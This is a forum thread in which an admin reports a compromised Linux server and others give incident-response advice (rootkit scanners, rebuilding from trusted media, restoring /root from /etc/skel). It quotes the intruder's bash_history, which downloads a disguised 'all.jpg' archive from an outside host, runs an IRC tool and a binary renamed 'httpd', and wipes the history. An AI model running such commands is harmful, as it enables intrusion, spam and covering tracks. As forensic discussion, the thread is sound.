Root user bash shell look like "bash-2.05b#" and /root empty
 

Hi there

Please help me..anyone

My server was attack by a scriptkiddie and the little bastard loaded a script which ran from the /tmp dir, I managed to delete everything and the server seems to be fine but...after my last restart I connected using ssh/root and my prompt appear like "bash-2.05b#" I then did a directory listing in the root dir and found it to be empty????

Whats going on?

Has this box been seriuosly compromised and I am to stupid to realise?

Any help or suggestions, thanks

PS If this post is in the wrong place, oops sorry

But if you login locally (physically login to the system) is the root filesystem there?

In the meantime, I would highly recommend downloading rkhunter or chkrootkit and scanning the system. Also, do you have any idea of how the system was compromised, any of the files that were on the system, or what commands were executed (e.g. bash history)?

Thanks for you reponse :)

I am unable to log onto the machine locally, it lives on the otherside of the world from me, I will ask the ISP guys to have a look.

I have run all the tools you spoke of and everything checks out fine
Here is the bash_history

keru.100free.com/all.jpg
tar xzvf all.jpg
rm -rf all.jpg
cd all
cd acy
./acycmech-linux 3 "#sex123456" - *\!*@supr3mul.users.undernet.org
cd ..
cp linux /var/tmp/httpd
/var/tmp/httpd
cat /proc/cpuinfo
cd ~
ls -a
echo > .bash_history

All I did was delete the user and I found a funny process running in the /tmp dir, I deleted everthing in the /tmp a and killed the process.

What that process was doing was sending email(Spam) that looked like it was comming from ebay.com, that stopped.

What else should I do??

Thanks a million

So a new user was created on the system?

From the bash_history, it looks like there might be stuff in /var/tmp as well. Note that the bash_history is likely incomplete (you can see him try and wipe it with the last command). What user was this bash_history from?

Frankly, this looks very suspect, and I would rebuild this box from trusted media. The fact that you do not have physical access to this box is going to make doing any kind of forensic analysis difficult. Normally I would tell you to power the box down and boot using a CD-ROM based distro like Knoppix, mount the compromised system and see if the filesystem is intact. However that isn't really an option here it seems. The odd bash prompt and missing filesystem is concerning, especially since the system is still running and is able to authenticate you to a non-existent /etc/passwd.

The user existed but was created /bin/bash and a VERY weak password (not by me, by my incompitent colleague), it was for a client who wanted a POP3/imap email.

I have a feeling that in my panic I might have typed:

rm -Rf /root

What would have happen if I was stupid enough to do that?

A re-install will be abit diffcult, with the current political enviroment within my office it will almost certainly mean a move to Mircosoft Windows which will alomost certainly result in my resignation. So i sort need to try and fix this mess on the hush hush.

Again thanks alot for your help

If you can be 101+% sure the root isn't compromised and there are no backdoors etc. kiddie stuff on the server I think you can restore your server's normal run, after deleting/upgrading the vulnerable software you have on the server. But I wouldn't trust that machine in that situation. I would reinstall.

It would just delete root's home filesystem, in which case you would likely have effects like you're experiencing, like the odd bash prompt because the .bashrc and user-specific config files are all missing. It's really important to be certain that *you* did that and not the intruder. If the intruder was able to delete files owned by root, then they had administrative access and you are hosed and they could have basically done anything including install malicious kernel modules or even replace the kernel itself with version that happily report everything is Ok and do other nasty things like neglect to show any files owned by the intruder when using system command like ls. So it is very important to be sure of this.

Frankly I think you should reinstall and deal with the consequences, but I'm not you and I can't pretend to know what kind of position you are in, so I'll leave it at that.

If you just hosed /root with rm -rf /root, then you can likely just rebuild that part of the filesystem. There should be copies of the standard user-specific config files in /etc/skel/. You can copy these over to /root and make sure the permissions and ownership are ok.